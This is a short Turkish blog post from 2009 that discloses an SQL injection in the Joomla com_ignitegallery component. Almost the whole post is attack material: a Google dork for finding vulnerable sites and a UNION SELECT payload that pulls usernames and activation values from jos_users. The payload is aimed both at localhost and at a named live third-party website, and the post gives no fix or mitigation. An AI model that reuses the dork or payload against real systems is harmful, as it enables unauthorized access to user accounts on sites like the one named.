19 Aralık 2009 Cumartesi

Joomla com_ignitegallery SQL İNJECTİON

bu acıgı hiçbir yerde görmedim bizzat kendim buldum ama bgh7 sordum bu eklentide acık bulundumu diye evt bulundu dedi..::(:( yinede yayımlayım istedim ben...

google dork : inurl:com_ignitegallery

http://localhost/index.php?option=com_ignitegallery&task=view&gallery=-3 UNION SELECT 1,2,group_concat(username,0x3D,activation),4,5,6,7,8,9,10 from jos_users

http://www.policeexplorer.org/index.php?option=com_ignitegallery&task=view&gallery=-3 UNION SELECT 1,2,group_concat(username,0x3D,activation),4,5,6,7,8,9,10 from jos_users

Hiç yorum yok :

Yorum Gönderme